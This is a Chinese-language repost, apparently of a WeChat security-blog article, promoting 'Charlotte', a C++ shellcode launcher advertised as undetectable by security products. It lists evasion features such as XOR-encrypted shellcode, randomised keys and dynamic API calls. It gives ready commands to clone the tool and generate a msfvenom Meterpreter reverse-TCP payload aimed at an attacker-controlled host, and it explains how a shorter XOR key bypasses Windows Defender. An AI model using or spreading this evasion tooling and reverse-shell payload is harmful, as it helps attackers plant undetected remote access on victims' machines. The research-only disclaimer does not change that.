关于Charlotte
Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。
工具特性
截止至2021年5月13日之前,该工具的检测结果为0/26;
该工具支持动态调用Win32 API函数;
对Shellcode和函数名进行异或加密;
每次运行随机化异或密钥和变量;
在Kali Linux上,只需运行“apt-get install mingw-w64*”即可;
支持随机字符串长度和异或密钥长度;
antiscan.me
工具使用
首先,我们需要使用git clone命令将该项目源码克隆至本地,并使用脚本工具生成Shellcode文件。具体操作示例如下:
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
使用msfvenom -p测试以及Cobalt Strike原始格式Payload
强化功能
很明显,Windows Defender是能够检测到.DLL代码的,但我们在POC中通过将16字节大小的异或密钥降低至9个字节,就可以规避检测了。
转自:freebuf
推荐阅读
学习更多技术,关注我:
觉得文章不错给点个‘再看’吧
原文始发于微信公众号(编码安全研究):Charlotte:完全不会被检测到的Shellcode启动器
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论